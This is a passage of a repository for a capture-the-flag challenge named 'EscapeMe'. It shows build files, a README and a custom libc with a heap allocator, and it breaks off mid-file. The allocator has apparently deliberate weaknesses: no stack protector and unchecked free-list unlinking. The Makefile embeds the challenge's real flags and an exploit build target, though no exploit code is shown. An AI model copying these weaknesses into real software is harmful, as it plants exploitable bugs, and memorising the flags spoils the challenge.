├── .gitignore ├── Makefile ├── README.md ├── bin ├── Makefile ├── libc │ ├── .gitignore │ ├── Makefile │ ├── assert │ │ ├── Makefile │ │ └── assert.c │ ├── export.map │ ├── io │ │ ├── Makefile │ │ ├── read.c │ │ └── write.c │ ├── libio │ │ ├── Makefile │ │ └── ioputs.c │ ├── malloc │ │ ├── Makefile │ │ ├── arena.c │ │ ├── arena.h │ │ ├── malloc.c │ │ └── malloc.h │ ├── misc │ │ ├── Makefile │ │ ├── brk.c │ │ └── mmap.c │ ├── stdio │ │ ├── Makefile │ │ ├── itoa.c │ │ └── printf.c │ ├── stdlib │ │ ├── Makefile │ │ ├── abort.c │ │ ├── atoi.c │ │ └── exit.s │ ├── string │ │ ├── Makefile │ │ ├── mem.c │ │ └── str.c │ ├── syscall.h │ ├── template.mk │ └── test │ │ ├── Makefile │ │ ├── malloc.c │ │ ├── memory.c │ │ ├── print.c │ │ ├── rw.c │ │ └── start.s ├── memo.c └── start.s ├── exploit ├── Makefile ├── exploit.c ├── exploit.py ├── part │ ├── exploit_lv1.c │ ├── exploit_lv2.c │ ├── exploit_lv3.c │ └── exploit_note.py ├── release ├── start.s └── utils │ ├── Makefile │ ├── exit.s │ ├── hypercall.h │ ├── hypercall.s │ ├── io.c │ ├── mmap.c │ ├── puts.c │ ├── string.c │ └── syscall.h ├── kernel ├── .gitignore ├── Makefile ├── bits.h ├── elf │ ├── Makefile │ ├── elf.c │ └── elf.h ├── kernel.c ├── memory │ ├── Makefile │ ├── memory.h │ ├── sysmem.c │ ├── sysmem.h │ ├── usermem.c │ └── usermem.h ├── service │ ├── Makefile │ ├── hypercall.h │ ├── hypercall.s │ ├── switch.h │ ├── switch.s │ └── syscall.c ├── startup.s ├── template.mk └── utils │ ├── Makefile │ ├── misc.h │ └── misc.s ├── kvm ├── .gitignore ├── Makefile ├── bits.h ├── main.c ├── template.mk ├── utils │ ├── Makefile │ ├── debug.c │ ├── debug.h │ ├── module.c │ ├── module.h │ ├── palloc.c │ ├── palloc.h │ ├── translate.c │ └── translate.h └── vm │ ├── Makefile │ ├── kvm_handler.c │ ├── kvm_handler.h │ ├── vm.c │ └── vm.h └── release ├── hashcash.py ├── libc-2.27.so ├── pow.py └── run.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .* 2 | !.git* 3 | 4 | *.txt 5 | 6 | *.swp 7 | 8 | *.elf 9 | *.bin 10 | *.a 11 | *.o 12 | *.d 13 | *.pyc 14 | 15 | core 16 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | OUTDIR := release 2 | 3 | SUB_OBJS := kvm/kvm.elf kernel/kernel.bin bin/memo-static.elf 4 | TARGET := $(addprefix $(OUTDIR)/,$(notdir $(SUB_OBJS))) 5 | FLAG_FILE := flag2.txt flag3-*.txt 6 | FLAG_TARGET := $(addprefix $(OUTDIR)/,$(FLAG_FILE)) 7 | EXPLOIT := exploit/exploit.elf 8 | 9 | ifdef FLAG 10 | CTF_FLAG1 := ${FLAG}{fr33ly_3x3cu73_4ny_5y573m_c4ll} 11 | CTF_FLAG2 := ${FLAG}{ABI_1nc0n51573ncy_l34d5_70_5y573m_d357ruc710n} 12 | CTF_FLAG3 := ${FLAG}{Or1g1n4l_Hyp3rc4ll_15_4_h07b3d_0f_bug5} 13 | FLAG3_NAME := flag3-`echo -n ${CTF_FLAG3} | sha1sum | cut -d' ' -f1`.txt 14 | else 15 | CTF_FLAG1 := XXXXX{11111111111111111111111111111111} 16 | CTF_FLAG2 := XXXXX{22222222222222222222222222222222} 17 | CTF_FLAG3 := XXXXX{33333333333333333333333333333333} 18 | FLAG3_NAME := flag3-sha1_of_flag.txt 19 | endif 20 | 21 | export CTF_FLAG1 22 | 23 | .PHONY: all 24 | all: $(TARGET) $(FLAG_TARGET) 25 | 26 | $(TARGET): $(SUB_OBJS) 27 | cp $^ release 28 | strip -K main -K palloc release/kvm.elf 29 | strip --strip-debug release/memo-static.elf 30 | 31 | $(OUTDIR)/flag2.txt: 32 | echo "Here is second flag : ${CTF_FLAG2}" > $(OUTDIR)/flag2.txt 33 | 34 | $(OUTDIR)/flag3-*.txt: 35 | echo "Here is final flag : ${CTF_FLAG3}" > $(OUTDIR)/$(FLAG3_NAME) 36 | 37 | $(EXPLOIT): kernel/kernel.elf 
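# Note: the recipe below extracts the kernel's syscall_handler address from kernel.elf via nm and passes it to the exploit build as SYS_HANDLER.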
38 | $(MAKE) -C exploit SYS_HANDLER=0x0`nm $< | grep syscall_handler | cut -d' ' -f1` 39 | 40 | $(SUB_OBJS) kernel/kernel.elf: FORCE 41 | $(MAKE) -C $(dir $@) $(notdir $@) 42 | 43 | 44 | .PHONY: run 45 | run: $(TARGET) $(FLAG_TARGET) 46 | $(OUTDIR)/run.sh 47 | 48 | .PHONY: exploit 49 | exploit: $(TARGET) $(FLAG_TARGET) $(EXPLOIT) 50 | cd exploit && ./exploit.py 51 | 52 | .PHONY: release 53 | release: $(TARGET) $(FLAG_TARGET) 54 | bash -c "cd $(OUTDIR) && tar zcf EscapeMe.tar.gz {*.elf,*.bin,*.so,*.txt,pow.py}" 55 | 56 | .PHONY: clean 57 | clean: 58 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 59 | $(MAKE) clean -C exploit 60 | $(RM) $(TARGET) $(FLAG_TARGET) $(OUTDIR)/EscapeMe.tar.gz 61 | 62 | FORCE: 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EscapeMe 2 | 3 | ## Environment 4 | 5 | Ubuntu 18.04 6 | 7 | ## Requirement 8 | 9 | - make 10 | - gcc 11 | - nasm 12 | - execstack 13 | 14 | ## Usage 15 | 16 | Build 17 | 18 | $ make 19 | 20 | $ make FLAG=TWCTF # generate real flag 21 | 22 | Run 23 | 24 | $ make run 25 | 26 | $ make 27 | $ ./release/run.sh 28 | 29 | Exploit 30 | 31 | $ make exploit 32 | 33 | $ make 34 | $ cd exploit && ./exploit.py 35 | 36 | Clean 37 | 38 | $ make clean 39 | 40 | ## Attachement 41 | 42 | - pow.py 43 | - kvm.elf 44 | - kernel.bin (including flag1) 45 | - memo-static.elf 46 | - libc-2.27.so 47 | - flag2.txt 48 | - flag3-sha1\_of\_flag.txt 49 | 50 | ## Deployment on CTF Server 51 | 52 | $ ls -al /home/escape/ 53 | drwxr-x--- 2 root escape 4096 Aug 28 11:28 . 54 | drwxr-xr-x 8 root root 4096 Aug 28 10:10 .. 55 | -rw-r----- 1 root escape 75 Aug 28 10:10 flag2.txt 56 | -rw-r----- 1 root escape 67 Aug 28 10:10 flag3-415254a0b8be92e0a976f329ad3331aa6bbea816.txt 57 | -rw-r----- 1 root escape 8514 Aug 28 10:10 hashcash.pyc 58 | -rw-r----- 1 root escape 8544 Aug 28 10:10 kernel.bin 59 | -rwxr-x--- 1 root escape 23336 Aug 28 10:10 kvm.elf 60 | -rwxr-x--- 1 root escape 20176 Aug 28 10:10 memo-static.elf 61 | -rwxr-x--- 1 root escape 1684 Aug 28 11:28 pow.py 62 | -------------------------------------------------------------------------------- /bin/Makefile: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | SRCS := $(wildcard *.c) 4 | SHARED_TARGET := $(SRCS:.c=-shared.elf) 5 | STATIC_TARGET := $(SRCS:.c=-static.elf) 6 | 7 | CFLAGS := -Wall -fno-stack-protector -fno-PIE -g3 8 | LDFLAGS := -nostdlib -no-pie 9 | 10 | .PHONY: all 11 | all: $(SHARED_TARGET) $(STATIC_TARGET) 12 | 13 | %-shared.elf: %.c start.o libc/libc.so 14 | $(CC) $(CFLAGS) $(LDFLAGS) start.o $< -L./libc -lc -o $@ 15 | execstack -c $@ 16 | 17 | %-static.elf: start.o %.c libc/libc.a 18 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ 19 | execstack -c $@ 20 | 21 | libc/libc.so libc/libc.a: 22 | $(MAKE) -C libc 23 | 24 | %.o: %.s 25 | $(AS) -f elf64 $^ 26 | 27 | .PHONY: clean 28 | clean: 29 | $(RM) $(SHARED_TARGET) $(STATIC_TARGET) 30 | $(MAKE) clean -C libc 31 | -------------------------------------------------------------------------------- /bin/libc/.gitignore: -------------------------------------------------------------------------------- 1 | .* 2 | !.gitignore 3 | 4 | *.txt 5 | *.swp 6 | 7 | *.so 8 | *.a 9 | *.bin 10 | *.elf 11 | *.o 12 | *.d 13 | -------------------------------------------------------------------------------- /bin/libc/Makefile: -------------------------------------------------------------------------------- 1 
| SHARED_TARGET := libc.so 2 | STATIC_TARGET := libc.a 3 | 4 | SUB_OBJS := io/io.a libio/libio.a \ 5 | stdio/stdio.a stdlib/stdlib.a malloc/malloc.a string/string.a \ 6 | assert/assert.a misc/misc.a 7 | EXPORT := export.map 8 | 9 | CFLAGS := -Wall -masm=intel -fno-stack-protector -fPIE -g3 10 | LDFLAGS := -shared -pie -nostdlib -E --version-script=$(EXPORT) 11 | 12 | export CFLAGS 13 | 14 | .PHONY: all 15 | all: $(SHARED_TARGET) $(STATIC_TARGET) 16 | $(MAKE) -C test 17 | 18 | $(SHARED_TARGET): $(SUB_OBJS) 19 | $(LD) $(LDFLAGS) --whole-archive $^ -o $@ 20 | 21 | $(STATIC_TARGET): $(SUB_OBJS) 22 | $(AR) cqT _$@ $^ 23 | echo "create $@\naddlib _$@\nsave\nend" | ar -M 24 | $(RM) _$@ 25 | 26 | $(SUB_OBJS): FORCE 27 | $(MAKE) -C $(dir $@) $(notdir $@) 28 | 29 | .PHONY: clean 30 | clean: 31 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 32 | $(MAKE) clean -C test 33 | $(RM) $(SHARED_TARGET) $(STATIC_TARGET) 34 | 35 | FORCE: 36 | -------------------------------------------------------------------------------- /bin/libc/assert/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := assert.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/assert/assert.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void __assert_fail (const char *assertion, const char *file, unsigned int line, const char *function){ 4 | //__assert_fail_base (_("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n"), assertion, file, line, function); 5 | abort(); 6 | } 7 | -------------------------------------------------------------------------------- /bin/libc/export.map: -------------------------------------------------------------------------------- 1 | { 2 | global: 3 | read; 4 | write; 5 | puts; 6 | malloc; 7 | calloc; 8 | realloc; 9 | free; 10 | brk; 11 | sbrk; 12 | mmap; 13 | mprotect; 14 | munmap; 15 | abort; 16 | atoi; 17 | itoa; 18 | exit; 19 | memset; 20 | memcpy; 21 | strlen; 22 | strcat; 23 | strncat; 24 | strchr; 25 | strdup; 26 | printf; 27 | sprintf; 28 | local: *; 29 | }; 30 | -------------------------------------------------------------------------------- /bin/libc/io/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := io.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/io/read.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../syscall.h" 5 | 6 | ssize_t read(int fd, void *buf, size_t count){ 7 | ssize_t n; 8 | 9 | if(!count) 10 | return 0; 11 | 12 | if (fd < 0 || buf == NULL) 13 | return -1; 14 | 15 | syscall(n, NR_read); 16 | 17 | return n; 18 | } 19 | -------------------------------------------------------------------------------- /bin/libc/io/write.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../syscall.h" 5 | 6 | ssize_t write(int fd, void *buf, size_t count){ 7 | ssize_t n; 8 | 9 | if(!count) 10 | return 0; 11 | 12 | if (fd < 0 || buf == NULL) 13 | return -1; 14 | 15 | syscall(n, NR_write); 16 | 17 | return n; 18 | } 19 | -------------------------------------------------------------------------------- /bin/libc/libio/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := libio.a 
2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/libio/ioputs.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int puts(const char *s){ 5 | int n; 6 | 7 | if((n = write(1, s, strlen(s)))) 8 | write(1, "\n", 1); 9 | 10 | return n; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /bin/libc/malloc/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := malloc.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/malloc/arena.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "arena.h" 3 | 4 | extern struct malloc_state main_arena; 5 | 6 | #define mutex_lock(mutex) do { if(__sync_bool_compare_and_swap(mutex, 0, 1)) break; } while (1); 7 | #define mutex_unlock(mutex) (*mutex = 0) 8 | 9 | mstate arena_get(size_t bytes){ 10 | mstate av = &main_arena; 11 | 12 | arena_aquire(av); 13 | return av; 14 | } 15 | 16 | void arena_aquire(mstate av){ 17 | if(av) 18 | mutex_lock(&av->mutex); 19 | } 20 | 21 | void arena_release(mstate av){ 22 | if(av) 23 | mutex_unlock(&av->mutex); 24 | } 25 | -------------------------------------------------------------------------------- /bin/libc/malloc/arena.h: -------------------------------------------------------------------------------- 1 | #ifndef _ARENA_H 2 | #define _ARENA_H 3 | 4 | #include 5 | #include "malloc.h" 6 | 7 | struct heap_info { 8 | mstate ar_ptr; 9 | size_t size; 10 | }; 11 | typedef struct heap_info* hinfo; 12 | 13 | mstate arena_get(size_t bytes); 14 | void arena_aquire(mstate ar); 15 | void arena_release(mstate ar); 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /bin/libc/malloc/malloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "malloc.h" 10 | #include "arena.h" 11 | 12 | #define PAGESIZE (0x1000) 13 | #define ALIGN_DOWN(base, size) ((base) & -((__typeof__ (base)) (size))) 14 | #define ALIGN_UP(base, size) ALIGN_DOWN ((base) + (size) - 1, (size)) 15 | 16 | #define HEAP_MIN_SIZE (32 * 1024) 17 | #define HEAP_MAX_SIZE (1024 * 1024) 18 | #define DEFAULT_MMAP_THRESHOLD (128 * 1024) 19 | 20 | #define PREV_INUSE_BIT (0x1) 21 | #define PREV_INUSE(p) ((p)->size & PREV_INUSE_BIT) 22 | #define INUSE_AT_OFFSET(p, s) PREV_INUSE((mchunkptr)((void*)(p) + (s))) 23 | #define SET_INUSE_AT_OFFSET(p, s) ((mchunkptr)((void*)(p) + (s)))->size |= PREV_INUSE_BIT 24 | #define CLEAR_INUSE_AT_OFFSET(p, s) ((mchunkptr)((void*)(p) + (s)))->size &= ~(PREV_INUSE_BIT) 25 | #define INUSE(p) INUSE_AT_OFFSET((p), chunksize(p)) 26 | #define SET_INUSE(p) SET_INUSE_AT_OFFSET((p), chunksize(p)) 27 | #define CLEAR_INUSE(p) CLEAR_INUSE_AT_OFFSET((p), chunksize(p)) 28 | 29 | #define IS_MMAPPED_BIT (0x2) 30 | #define IS_MMAPPED(p) ((p)->size & IS_MMAPPED_BIT) 31 | 32 | #define NON_MAIN_ARENA_BIT (0x4) 33 | #define NON_MAIN_ARENA(p) ((p)->size & NON_MAIN_ARENA_BIT) 34 | #define SET_NON_MAIN_ARENA(p) ((p)->size |= NON_MAIN_ARENA_BIT) 35 | 36 | #define SIZE_BITS (PREV_INUSE_BIT | IS_MMAPPED_BIT | NON_MAIN_ARENA_BIT) 37 | #define CHUNK_SIZE(p) (CHUNK_SIZE_NOMASK(p) & ~(SIZE_BITS)) 38 | #define CHUNK_SIZE_NOMASK(p) 
((p)->size) 39 | #define PREV_SIZE(p) ((p)->prev_size) 40 | #define SET_HEAD_SIZE(p, s) ((p)->size = (((p)->size & SIZE_BITS) | (s))) 41 | #define SET_HEAD(p, s) ((p)->size = (s)) 42 | #define SET_PREV_SIZE(p, sz) ((p)->prev_size = (sz)) 43 | #define SET_FOOT(p, s) (CHUNK_AT_OFFSET((p),(s))->prev_size = (s)) 44 | 45 | #define NEXT_CHUNK(p) ((mchunkptr)((void*)(p) + CHUNK_SIZE(p))) 46 | #define PREV_CHUNK(p) ((mchunkptr)((void*)(p) - PREV_SIZE(p))) 47 | #define CHUNK_AT_OFFSET(p, s) ((mchunkptr)((void*)(p) + (s))) 48 | 49 | #define CHUNK2MEM(p) ((void*)(p) + SIZE_SZ*2) 50 | #define MEM2CHUNK(mem) ((mchunkptr)((void*)(mem) - SIZE_SZ*2)) 51 | 52 | #define BIN_AT(m, i) ((mbinptr)((void*)&((m)->bins[((i)-1) * 2]) - offsetof(struct malloc_chunk, fd))) 53 | #define UNSORTED_CHUNKS(M) (BIN_AT(M, 1)) 54 | #define INITIAL_TOP(M) (UNSORTED_CHUNKS(M)) 55 | 56 | #define IN_SMALLBIN_RANGE(sz) ((sz) < MIN_LARGE_SIZE) 57 | 58 | #define FIRST(b) ((b)->fd) 59 | #define LAST(b) ((b)->bk) 60 | 61 | #define LINK(p, fwd, bck) \ 62 | do { \ 63 | (p)->fd = (fwd); \ 64 | (p)->bk = (bck); \ 65 | (bck)->fd = (fwd)->bk = (p); \ 66 | } while(0); 67 | 68 | #define NONCONTIGUOUS_BIT (2U) 69 | #define CONTIGUOUS(M) (!((M)->flags & NONCONTIGUOUS_BIT)) 70 | #define SET_NONCONTIGUOUS(M) ((M)->flags |= NONCONTIGUOUS_BIT) 71 | #define SET_CONTIGUOUS(M) ((M)->flags &= ~NONCONTIGUOUS_BIT) 72 | 73 | #define HEAP_FOR_PTR(ptr) ((hinfo) ((uint64_t) (ptr) & ~(HEAP_MAX_SIZE - 1))) 74 | #define ARENA_FOR_CHUNK(ptr) (NON_MAIN_ARENA(ptr) ? HEAP_FOR_PTR(ptr)->ar_ptr : &main_arena) 75 | 76 | struct malloc_state main_arena; 77 | static struct malloc_par mp = { 78 | .mmap_threshold = DEFAULT_MMAP_THRESHOLD 79 | }; 80 | 81 | static void *_int_malloc(mstate av, size_t bytes); 82 | static void _int_free(mstate av, mchunkptr p); 83 | static void *_int_realloc(mstate av, mchunkptr oldp, size_t oldsize, size_t nb); 84 | static void malloc_init_state(mstate av); 85 | static void *sysmalloc(mstate av, size_t nb); 86 | static void _alloc_split(mstate av, mchunkptr p, size_t nb); 87 | static void *_alloc_top(mstate av, size_t nb); 88 | static void link_bins(mstate av, mchunkptr p); 89 | static void unlink_freelist(mchunkptr p); 90 | static void munmap_chunk(mchunkptr p); 91 | 92 | void *malloc(size_t bytes) { 93 | mchunkptr victim; 94 | mstate ar_ptr; 95 | void *mem; 96 | 97 | ar_ptr = arena_get(bytes); 98 | mem = _int_malloc(ar_ptr, bytes); 99 | arena_release(ar_ptr); 100 | 101 | if(!mem) 102 | return NULL; 103 | 104 | victim = MEM2CHUNK(mem); 105 | assert(IS_MMAPPED(victim) || ar_ptr == ARENA_FOR_CHUNK(victim)); 106 | 107 | return mem; 108 | } 109 | 110 | void free(void *mem) { 111 | mchunkptr p; 112 | mstate ar_ptr; 113 | 114 | if(!mem) 115 | return; 116 | 117 | p = MEM2CHUNK(mem); 118 | 119 | if(IS_MMAPPED(p)){ 120 | munmap_chunk(p); 121 | return; 122 | } 123 | 124 | ar_ptr = ARENA_FOR_CHUNK(p); 125 | arena_aquire(ar_ptr); 126 | _int_free(ar_ptr, p); 127 | arena_release(ar_ptr); 128 | } 129 | 130 | void *realloc(void *oldmem, size_t bytes){ 131 | mstate ar_ptr; 132 | mchunkptr oldp; 133 | size_t oldsize, nb; 134 | void *newmem; 135 | 136 | if(!oldmem) 137 | return malloc(bytes); 138 | 139 | oldp = MEM2CHUNK(oldmem); 140 | oldsize = CHUNK_SIZE(oldp); 141 | 142 | nb = REQUEST2SIZE(bytes); 143 | 144 | if(IS_MMAPPED(oldp)){ 145 | if(oldsize - SIZE_SZ >= nb) 146 | return oldmem; 147 | 148 | newmem = malloc(bytes); 149 | if(!newmem) 150 | return NULL; 151 | 152 | memcpy(newmem, oldmem, oldsize - SIZE_SZ); 153 | munmap_chunk(oldp); 154 | 155 | return 
newmem; 156 | } 157 | 158 | ar_ptr = arena_get(bytes); 159 | newmem = _int_realloc(ar_ptr, oldp, oldsize, nb); 160 | arena_release(ar_ptr); 161 | 162 | #ifdef DEBUG 163 | printf("realloc : %p\n", newmem); 164 | #endif 165 | return newmem; 166 | } 167 | 168 | void *calloc(size_t n, size_t elem_size){ 169 | size_t bytes; 170 | mchunkptr victim; 171 | mstate ar_ptr; 172 | void *mem; 173 | 174 | bytes = n * elem_size; 175 | ar_ptr = arena_get(bytes); 176 | mem = _int_malloc(ar_ptr, bytes); 177 | arena_release(ar_ptr); 178 | 179 | if(!mem) 180 | return NULL; 181 | 182 | victim = MEM2CHUNK(mem); 183 | assert(IS_MMAPPED(victim) || ar_ptr == ARENA_FOR_CHUNK(victim)); 184 | 185 | #ifdef DEBUG 186 | printf("calloc : %p\n", mem); 187 | #endif 188 | memset(mem, 0, bytes); 189 | return mem; 190 | } 191 | 192 | static void *_int_malloc(mstate av, size_t bytes){ 193 | mchunkptr victim; 194 | void *mem; 195 | 196 | size_t size, nb; 197 | unsigned idx; 198 | mbinptr bin; 199 | 200 | nb = REQUEST2SIZE(bytes); 201 | 202 | if(av && !av->top) 203 | malloc_init_state(av); 204 | 205 | if(IN_SMALLBIN_RANGE(nb)){ 206 | idx = SMALLBIN_INDEX(nb); 207 | bin = BIN_AT(av, idx); 208 | 209 | if((victim = LAST(bin)) && victim != bin){ 210 | unlink_freelist(victim); 211 | 212 | SET_INUSE_AT_OFFSET(victim, nb); 213 | goto alloc_complete; 214 | } 215 | idx++; 216 | } 217 | else 218 | idx = LARGEBIN_INDEX(nb); 219 | 220 | while((victim = UNSORTED_CHUNKS(av)->bk) != UNSORTED_CHUNKS(av)){ 221 | unlink_freelist(victim); 222 | 223 | size = CHUNK_SIZE(victim); 224 | if(size == nb){ 225 | SET_INUSE_AT_OFFSET(victim, size); 226 | goto alloc_complete; 227 | } 228 | 229 | link_bins(av, victim); 230 | } 231 | 232 | if(!IN_SMALLBIN_RANGE(nb)){ 233 | bin = BIN_AT(av, idx); 234 | 235 | if((victim = FIRST(bin)) == bin || CHUNK_SIZE(victim) < nb) 236 | goto next_bin; 237 | 238 | do { 239 | victim = victim->bk_nextsize; 240 | } while((size = CHUNK_SIZE(victim)) < nb); 241 | 242 | if(victim != LAST(bin) && CHUNK_SIZE_NOMASK(victim) == CHUNK_SIZE_NOMASK(victim->fd)) 243 | victim = victim->fd; 244 | 245 | unlink_freelist(victim); 246 | _alloc_split(av, victim, nb); 247 | 248 | goto alloc_complete; 249 | } 250 | 251 | next_bin: 252 | for(; idx= NSMALLBINS){ 259 | if(CHUNK_SIZE(victim) < nb) 260 | continue; 261 | 262 | do { 263 | victim = victim->bk_nextsize; 264 | } while((size = CHUNK_SIZE(victim)) < nb); 265 | 266 | if(victim != LAST(bin) && CHUNK_SIZE_NOMASK(victim) == CHUNK_SIZE_NOMASK(victim->fd)) 267 | victim = victim->fd; 268 | } 269 | 270 | unlink_freelist(victim); 271 | _alloc_split(av, victim, nb); 272 | 273 | goto alloc_complete; 274 | } 275 | 276 | if(!(victim = _alloc_top(av, nb))) 277 | victim = sysmalloc(av, nb); 278 | 279 | alloc_complete: 280 | if(av != &main_arena) 281 | SET_NON_MAIN_ARENA(victim); 282 | 283 | #ifdef DEBUG 284 | printf("_int_malloc(0x%0x) : %p\n", nb, victim); 285 | #endif 286 | 287 | mem = CHUNK2MEM(victim); 288 | return mem; 289 | } 290 | 291 | static void _int_free(mstate av, mchunkptr p){ 292 | mchunkptr nextchunk; 293 | size_t size, prevsize, nextsize; 294 | 295 | size = CHUNK_SIZE(p); 296 | nextchunk = CHUNK_AT_OFFSET(p, size); 297 | nextsize = CHUNK_SIZE(nextchunk); 298 | 299 | #ifdef DEBUG 300 | printf("_int_free(0x%0x) : %p\n", size, p); 301 | #endif 302 | 303 | if(!PREV_INUSE(nextchunk)){ 304 | abort(); 305 | } 306 | 307 | if(!PREV_INUSE(p)){ 308 | prevsize = PREV_SIZE(p); 309 | size += prevsize; 310 | p = CHUNK_AT_OFFSET(p, -prevsize); 311 | unlink_freelist(p); 312 | } 313 | 314 | if(nextchunk == 
av->top){ 315 | size += nextsize; 316 | SET_HEAD(p, size | PREV_INUSE_BIT); 317 | av->top = p; 318 | } 319 | else{ 320 | mchunkptr fwd, bck; 321 | 322 | if(INUSE_AT_OFFSET(nextchunk, nextsize)) 323 | CLEAR_INUSE_AT_OFFSET(nextchunk, 0); 324 | else{ 325 | unlink_freelist(nextchunk); 326 | size += nextsize; 327 | } 328 | 329 | SET_HEAD(p, size | PREV_INUSE_BIT); 330 | SET_FOOT(p, size); 331 | 332 | if(!IN_SMALLBIN_RANGE(size)) 333 | p->fd_nextsize = p->bk_nextsize = NULL; 334 | 335 | bck = UNSORTED_CHUNKS(av); 336 | fwd = bck->fd; 337 | #ifdef DEBUG 338 | printf("[%s]link : %p\n", __func__, p); 339 | #endif 340 | LINK(p, fwd, bck); 341 | } 342 | } 343 | 344 | static void *_int_realloc(mstate av, mchunkptr oldp, size_t oldsize, size_t nb){ 345 | mchunkptr newp, nextchunk; 346 | size_t nextsize; 347 | 348 | assert(oldp && CHUNK_SIZE(oldp) >= MINSIZE && oldsize < av->system_mem); 349 | 350 | nextchunk = CHUNK_AT_OFFSET(oldp, oldsize); 351 | nextsize = CHUNK_SIZE(nextchunk); 352 | newp = NULL; 353 | 354 | if(oldsize >= nb) 355 | newp = oldp; 356 | else if(nextchunk == av->top){ 357 | if(oldsize + nextsize < nb + MINSIZE) 358 | goto newalloc; 359 | if(!_alloc_top(av, nb - oldsize)) 360 | goto newalloc; 361 | 362 | newp = oldp; 363 | SET_HEAD_SIZE(newp, nb); 364 | } 365 | else if(!INUSE_AT_OFFSET(nextchunk, nextsize)){ 366 | size_t newsize; 367 | 368 | if((newsize = oldsize + nextsize) < nb) 369 | goto newalloc; 370 | 371 | newp = oldp; 372 | unlink_freelist(nextchunk); 373 | SET_HEAD_SIZE(newp, newsize); 374 | } 375 | 376 | if(newp){ 377 | _alloc_split(av, newp, nb); 378 | return CHUNK2MEM(newp); 379 | } 380 | 381 | newalloc: 382 | do{ 383 | void *newmem; 384 | 385 | newmem = _int_malloc(av, nb - MALLOC_ALIGN_MASK); 386 | if(!newmem) 387 | return NULL; 388 | 389 | assert(oldsize < nb); 390 | memcpy(newmem, CHUNK2MEM(oldp), oldsize - SIZE_SZ); 391 | _int_free(av, oldp); 392 | 393 | return newmem; 394 | } while(0); 395 | } 396 | 397 | static void malloc_init_state(mstate av){ 398 | int i; 399 | mbinptr bin; 400 | 401 | for(i=1; ifd = bin->bk = bin; 404 | } 405 | 406 | SET_NONCONTIGUOUS(av); 407 | av->top = INITIAL_TOP(av); 408 | } 409 | 410 | static void *sysmalloc(mstate av, size_t nb){ 411 | mchunkptr old_top; 412 | size_t old_size; 413 | void *old_end; 414 | 415 | size_t size; 416 | void *brk; 417 | mchunkptr p; 418 | 419 | if(!av || nb > mp.mmap_threshold){ 420 | void *mm; 421 | int64_t correction; 422 | size_t front_misalign; 423 | 424 | size = ALIGN_UP(nb + MINSIZE, PAGESIZE); 425 | if(size < nb) 426 | goto try_brk; 427 | 428 | mm = mmap(0, size, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 429 | if(mm == MAP_FAILED) 430 | goto try_brk; 431 | 432 | front_misalign = (size_t)CHUNK2MEM(mm) & MALLOC_ALIGN_MASK; 433 | correction = front_misalign ? 
MALLOC_ALIGNMENT - front_misalign : 0; 434 | 435 | p = (mchunkptr)(mm + correction); 436 | SET_PREV_SIZE(p, correction); 437 | SET_HEAD(p, (size - correction) | IS_MMAPPED_BIT); 438 | 439 | //check_chunk(av, p); 440 | return p; 441 | } 442 | 443 | try_brk: 444 | if(!av) 445 | return NULL; 446 | 447 | old_top = av->top; 448 | old_size = CHUNK_SIZE(old_top); 449 | old_end = (void*)(CHUNK_AT_OFFSET(old_top, old_size)); 450 | brk = (void*) -1; 451 | 452 | assert(old_size < nb + MINSIZE); 453 | 454 | if(av == &main_arena){ 455 | size = nb + MINSIZE; 456 | 457 | if(CONTIGUOUS(av)) 458 | size -= old_size; 459 | size = ALIGN_UP(size, PAGESIZE); 460 | 461 | if(size > 0) 462 | brk = sbrk(size); 463 | if(brk == (void*)-1) 464 | return NULL; 465 | 466 | av->system_mem += size; 467 | 468 | if(brk == old_end) 469 | SET_HEAD(old_top, (size + old_size) | PREV_INUSE_BIT); 470 | else{ 471 | int64_t correction; 472 | void *snd_brk, *aligned_brk; 473 | size_t front_misalign, end_misalign; 474 | 475 | snd_brk = (void*)-1; 476 | aligned_brk = brk; 477 | 478 | if(CONTIGUOUS(av)){ 479 | if(old_size) 480 | av->system_mem += brk - old_end; 481 | 482 | front_misalign = (size_t)CHUNK2MEM(brk) & MALLOC_ALIGN_MASK; 483 | if(front_misalign){ 484 | correction = MALLOC_ALIGNMENT - front_misalign; 485 | aligned_brk += correction; 486 | } 487 | else 488 | correction = 0; 489 | 490 | correction += old_size; 491 | end_misalign = (size_t)(brk + size + correction); 492 | correction += (ALIGN_UP (end_misalign, PAGESIZE)) - end_misalign; 493 | 494 | snd_brk = sbrk(correction); 495 | } 496 | else{ 497 | front_misalign = (size_t)CHUNK2MEM(brk) & MALLOC_ALIGN_MASK; 498 | if(front_misalign) 499 | aligned_brk += MALLOC_ALIGNMENT - front_misalign; 500 | } 501 | 502 | if(snd_brk == (void*)-1){ 503 | correction = 0; 504 | snd_brk = sbrk(0); 505 | } 506 | 507 | av->top = (mchunkptr)aligned_brk; 508 | SET_HEAD(av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE_BIT); 509 | av->system_mem += correction; 510 | } 511 | } 512 | else{ 513 | // TODO 